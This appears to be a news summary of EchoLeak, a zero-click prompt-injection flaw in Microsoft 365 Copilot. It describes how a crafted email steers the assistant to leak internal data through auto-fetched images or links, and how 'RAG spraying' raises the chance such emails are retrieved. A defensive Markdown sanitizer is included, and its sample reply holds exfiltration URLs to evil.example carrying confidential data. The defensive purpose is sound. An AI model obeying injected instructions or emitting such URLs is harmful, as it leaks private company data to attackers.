Critical Zero-Click Vulnerability 'EchoLeak' Discovered in Microsoft 365 Copilot AI, Patching Underway
June 12, 2025
Cybersecurity researchers have uncovered a critical zero-click vulnerability in the Microsoft 365 Copilot AI agent, dubbed EchoLeak, which enables attackers to steal sensitive data via email without any user interaction.
The flaw, tracked as CVE-2025-32711 and rated critical with a CVSS score of 9.3, was identified by Aim Labs and reported to Microsoft, which deployed a server-side patch in May 2025.
If exploited, EchoLeak could expose a wealth of sensitive internal information, including emails, spreadsheets, and chats, raising significant concerns about the security of AI systems in workplace applications.
As AI integration into business systems grows, researchers stress the need for evolving security strategies to address the new challenges posed by these technologies.
Aim Labs has warned that similar vulnerabilities may exist in other RAG-based AI systems beyond Microsoft Copilot, highlighting a broader risk landscape.
The attack method involves crafting a malicious email with a prompt designed to mimic human communication, which can trick the AI into accessing and sharing privileged company data.
M365 Copilot is a RAG-based chatbot: it retrieves content from the company's own environment to answer questions, and that same retrieval path can pull private data into a response.
The assistant is integrated across the Office applications and draws on internal data to help users, but the way it is designed leaves that access open to abuse.
The AI may leak internal data through links or images embedded in its output, because the browser fetches those URLs automatically, without any click from the user.
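One defensive control against that exfiltration channel is to inspect an assistant's Markdown output before it is rendered and strip any link or image whose URL points outside an allowlist or carries an oversized query string. The code below is an added illustration, not Microsoft's or Aim Labs' code; the allowlisted hosts, the length threshold and the sample reply are all constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist of hosts the assistant may render links or images from.
ALLOWED_HOSTS = {"contoso.sharepoint.com", "teams.microsoft.com"}
MAX_QUERY_LEN = 64  # longer query strings are treated as a possible data carrier

# Inline Markdown: ![alt](url) or [text](url); group 1 is "!" for images.
INLINE_RE = re.compile(r"(!?)\[([^\]]*)\]\(\s*(\S+?)(?:\s+\"[^\"]*\")?\s*\)")
# Reference-style definition lines: [id]: url
REF_DEF_RE = re.compile(r"^[ \t]*\[([^\]]+)\]:[ \t]*(\S+).*$", re.MULTILINE)


def classify_url(url):
    """Return 'ok' or a short reason why rendering this URL is unsafe."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return "non-http scheme"
    if parsed.hostname not in ALLOWED_HOSTS:
        return "host not allowlisted: %s" % parsed.hostname
    if len(parsed.query) > MAX_QUERY_LEN:
        return "oversized query string"
    return "ok"


def sanitize_response(text):
    """Remove links/images that fail policy; return (clean_text, findings)."""
    findings = []

    def on_inline(m):
        bang, label, url = m.groups()
        verdict = classify_url(url)
        if verdict == "ok":
            return m.group(0)
        findings.append({"kind": "image" if bang else "link", "url": url, "reason": verdict})
        return label  # keep the visible text, drop the auto-fetched URL

    def on_ref_def(m):
        ref_id, url = m.groups()
        verdict = classify_url(url)
        if verdict == "ok":
            return m.group(0)
        findings.append({"kind": "reference " + ref_id, "url": url, "reason": verdict})
        return ""  # drop the definition so the reference never resolves

    text = INLINE_RE.sub(on_inline, text)
    text = REF_DEF_RE.sub(on_ref_def, text)
    return text, findings


# Constructed sample reply in which an injected prompt has steered the assistant
# into embedding internal data in an image URL and a reference-style link.
SAMPLE = (
    "Here is the summary you asked for.\n"
    "![status](https://evil.example/img.png?d=Q3_revenue_is_down_12_percent_confidential)\n"
    "See [the plan](https://contoso.sharepoint.com/sites/plan)\n"
    "[1]: https://evil.example/track?id=abc\n"
)
```

Running `sanitize_response(SAMPLE)` returns the reply with both external references removed and two findings describing what was stripped, which can be logged as a detection signal.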
Researchers have also noted the potential for 'RAG spraying,' where attackers send lengthy emails segmented into smaller parts to increase the likelihood of them being processed by Copilot.
Microsoft's stock has shown resilience, reflecting a year-to-date increase of 12.9%, despite the recent security concerns surrounding its AI technologies.
Experts suggest that addressing such vulnerabilities may require a fundamental rethinking of AI agent design to ensure better security in the future.
Summary based on 8 sources
Sources
TechRadar, Jun 12, 2025: Microsoft Copilot targeted in first “zero-click” attack on an AI agent - what you need to know
The Hacker News, Jun 12, 2025: Zero-Click AI Vulnerability Exposes Microsoft 365 Copilot Data Without User Interaction
SecurityWeek, Jun 12, 2025: ‘EchoLeak’ AI Attack Enabled Theft of Sensitive Data via Microsoft 365 Copilot